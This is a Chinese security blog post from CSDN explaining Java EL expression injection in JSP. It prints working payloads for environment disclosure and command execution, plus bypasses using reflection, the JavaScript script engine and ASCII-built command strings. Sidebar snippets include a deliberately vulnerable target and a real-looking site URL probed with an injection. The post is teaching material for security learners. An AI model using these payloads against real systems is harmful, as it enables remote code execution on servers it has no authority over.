『Java安全』EL表达式注入

已于 2022-04-02 19:42:41 修改
阅读量5k 收藏 6
点赞数 1
分类专栏: # Java安全基础 文章标签: java jsp tomcat el表达式注入 web安全
于 2022-04-02 11:55:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123900087
版权

文章目录

前言

EL表达式全称Express Language
在这里插入图片描述
EL表达式语法以${}包裹
在这里插入图片描述
其他使用方法见参考文章

EL表达式解析启用/禁用

默认为启用,jsp会解析EL表达式,除非配置<%@ page isELIgnored ="true|false" %>,或者是全局pom.xml设置

<jsp-config>
    <jsp-property-group>
        <url-pattern>*.jsp</url-pattern>
        <el-ignored>true</el-ignored>
    </jsp-property-group>
</jsp-config>

EL表达式注入

外部输入可控、输入会被解析从而造成注入漏洞

主要的注入表达式:

// 获取环境变量
${applicationScope}

// 获取web绝对路径
${pageContext.servletContext.getResource("")}
   
// 命令执行   
${pageContext.setAttribute("a", Runtime.getRuntime().exec("calc"))}

在这里插入图片描述

绕过方式

1. 反射

通常直接rce是不行的,通常会用到反射

${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}

2. js引擎rce

${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')")}

3.String类动态生成命令字符串(ASCII)

对于命令被明文过滤的情况

// 字符串 wh,多个cocnat嵌套构造whoami
java.lang.Character.toString(119).concat(java.lang.Character.toString(104))

参考引用

https://www.cnblogs.com/xdp-gacl/p/3938361.html
https://www.runoob.com/jsp/jsp-expression-language.html
https://xz.aliyun.com/t/7692

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123900087
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java代码审计】表达式注入
大河之犬的博客
04-02 870
表达式注入是一种安全漏洞,发生在应用程序中使用动态表达式的情况下。在表达式注入中,攻击者通过在输入数据中插入恶意代码来利用应用程序中的动态表达式执行漏洞,从而执行恶意操作。这种漏洞通常发生在使用解释性语言或动态执行代码的环境中。
Javaweb安全——表达式注入(EL+SpEL)
weixin_43610673的博客
07-22 2954
Java中表达式根据框架分为好多种,这里以JSP自带的表达式语言EL和使用较多的Spring框架所支持的SpEL为例。其基本语法为${变量表达式}。
EL表达式
顺其自然~专栏
09-22 310
以MVC模式设计程序,JSP只是视图,视图的任务就是显示响应,而不是在JSP中做任何关于程序控制和业务逻辑的事情。所以在JSP页面中应该尽可能少的、或者是完全不出现Java代码。 在使用JSP标准动作操作 JavaBean时,如果JavaBean的属性是 String类型或者基本类型,则能够实现类型的自动转换,如 JavaBean的属性从String类型可自动转换成int类型。如果 Javabean中的属性不是 String类型和基本类型,而是一个 Object类型,并且属性还有自己的属性,如何获得此 O
Java代码审计---SpEL表达式注入
最新发布
qq_45317844的博客
05-22 507
是 Spring 中的表达式语言,用于在运行时评估和处理表达式。它提供了一种灵活的方式来访问和操作对象的属性、方法和其他表达式。SpEL可以用于配置文件、注解、XML 配置等多种场景,用于实现动态的、可配置的行为。它支持常见的表达式操作,如算术运算、逻辑运算、条件判断、集合操作等,并且可以与 Spring 框架的其他功能整合使用。由于SpEL具有代码调用,我们可以通过SpEL注入来执行系统命令,进而导致RCE漏洞。
Java表达式注入JSP EL表达式注入
GalaxySpaceX的博客
08-16 1125
Java表达式注入JSP EL表达式注入
EL 表达式注入攻击
m0_62207482的博客
03-04 148
例如,${ userinfo}代表获取变量userinfo的值。当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量,例如:${ pageScope. userinfo}表示访问page范围中的userinfo变量。事实上,可以将EL表达式理解为一种简化的JSP代码。简单地说,使用EL表达式语法:${EL表达式}JSP表达式:<%=变量或表达式>声明jsp的成员变量或成员方法。
js中el表达式的使用和非空判断方法
12-03
在JS中使用EL表达式,我们实际上是将EL表达式的值注入到JS代码中,这需要通过服务器端渲染完成。例如,`${jsonData}`将会被替换为服务器端`jsonData`变量的值。 **二、Spring MVC与JSON数据** Spring MVC允许我们...
el表达式详解
10-08
3. **安全性**:对于用户输入的数据,使用EL表达式时应特别注意SQL注入安全问题。 #### 五、EL表达式总结 通过上述内容,我们可以看出EL表达式JSP开发中一个非常重要的工具,它简化了数据获取的过程,提高了...
javaScript使用EL表达式的几种方式
10-25
JavaScript中的EL(Expression Language)表达式,是一种在JavaServer Pages (JSP)中常见的用于访问和操作服务器端数据的语言。它允许开发者以简洁的方式获取...记得在使用EL表达式时注意安全问题,避免潜在的注入攻击。
表达式注入1
08-03
JSPEL表达式允许直接访问Java对象,如`${expression}`,如果不加以限制,攻击者可能构造出执行命令的表达式。 MVEL是一个强大的表达式语言,类似于OGNL和SPEL,也能执行Java代码。例如,`MVEL.eval(expression, ...
java中的EL表达式禁用
09-25
- 安全性:EL表达式有可能被用来执行恶意的代码注入,尤其是在不进行足够验证的情况下。 - 性能:在大型应用中,频繁的EL表达式解析可能会影响性能。 - 应用规范:有些项目可能有特定的编码规范,要求避免在视图层...
9、表达式注入漏洞_通用的poc,2024年互联网大厂网络安全面经总结
2401_84159839的博客
04-09 537
EL是为了让让JSP写起来更加简单,提供了在JSP中简化表达式的方法。获取数据执行运算获取Web开发常用队形调用Java方法。
EL表达式&&JSTL
chenguoao1999的博客
09-06 497
课程笔记Day41 EL表达式 JSTL标签库 第一章 EL表达式 第01节 基础理论 1、概念描述 1. 什么是 EL 表达式? EL 表达式是两个单词的缩写:Expression Language 表达式语言。 2. EL表达式有什么作用呢? 为了使JSP写起来更加简单 3. EL表达式的基础格式? ${表达式} 2、快速入门 位置 web/expression/el01_door.jsp <%@ page contentType="text/html;chars
[Java安全]—SPEL表达式注入
Sentiment的博客
05-01 4141
前言 在前几天的网刃杯中,出了一道SPEL注入Java题,在复现后其实对于原理和内部流程还是不够了解,所以现在浅学一下。 配置 https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce,导入maven依赖 为了后期debug调试简便些,可以修改一下控制器 修改后运行,访问localhost:9091/article?id=${5*5},出现结果25则为配置成功 影响版本 Spr
java 代码执行el,专属于java的漏洞——EL表达式注入
weixin_39997443的博客
03-20 1142
前言“FSRC经验分享”系列文章,旨在分享焦点科技信息安全部工作过程中的经验总结,包括但不限于漏洞分析、运营技巧、sdl推行、等保合规、自研工具等等。欢迎各位安全从业者持续关注~0x01EL简介表达式语言(Expression Language 以下简称EL)是以JSTL(JavaServer Pages Standard Tag Library,JSP标准标签库)的一部分出现的,原本被叫做SPE...
java el 表达式_JAVA WEB EL表达式注入
weixin_36132766的博客
02-20 174
#1 漏洞地址code 区域https://auth.p4p.sogou.com/login?service=${1000-900}code 区域https://auth.p4p.sogou.com/login?service=${pageContext}action="/login?service=com.caucho.jsp.PageContextImpl@2aaf3a58" method="...
Java表达式注入(OGNL 表达式注入
GalaxySpaceX的博客
08-23 1950
Java表达式注入(OGNL 表达式注入
【代码审计】表达式注入
TeamsSix 的 CSDN 空间
11-29 1043
1、介绍 表达式语言(Expression Language)简称 EL 表达式,是一种 JSP 内置的语言。 在 JSP 中,使用 ${} 来表示 EL 表达式,例如 ${name} 表示获取 name 变量。 在 EL 表达式中有两种获取对象属性的方法,第一种为 ${param.name},第二种为 ${param[name]} 2、实例 使用实例 使用 param 对象获取用户传入的参数值,这里的 ${param.name} 相当于 request.getParameter(“name”) <%
Java表达式注入(SpEL表达式注入
GalaxySpaceX的博客
08-18 1214
Java表达式注入(SpEL表达式注入
java帮忙写一个存在el表达式注入的靶场
05-26
首先,需要了解EL表达式注入的概念。EL表达式Java EE中用于访问JavaBean属性的一种语言,可以在JSP页面中使用。EL表达式注入是指攻击者通过构造恶意EL表达式,向服务器发送请求,从而获取或篡改数据。为了演示EL表达式注入的攻击效果,我们可以创建一个简单的靶场,供攻击者进行测试。 以下是一个简单的EL表达式注入靶场的代码实现: ```java @Controller public class ELInjectionController { @RequestMapping("/injection") public String injection(HttpServletRequest request) { String input = request.getParameter("input"); request.setAttribute("result", input); return "result"; } } ``` 这段代码实现了一个简单的EL表达式注入靶场,请求参数 `input` 通过 `request.getParameter` 方法获取,然后将其设置到 `request` 的属性中,并返回 `result` 视图。攻击者可以构造恶意的EL表达式,通过 `input` 参数进行注入攻击。 为了保护应用程序免受EL表达式注入攻击,可以采取以下措施: 1. 对用户输入进行严格的验证和过滤,防止恶意EL表达式注入。 2. 在应用程序中禁用EL表达式的使用,或者限制EL表达式的使用范围。 3. 使用最新版本的Web框架和Web容器,并及时更新相关的安全补丁。 注意:本文提供的代码示例仅供学习和研究使用,请勿用于恶意攻击行为。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值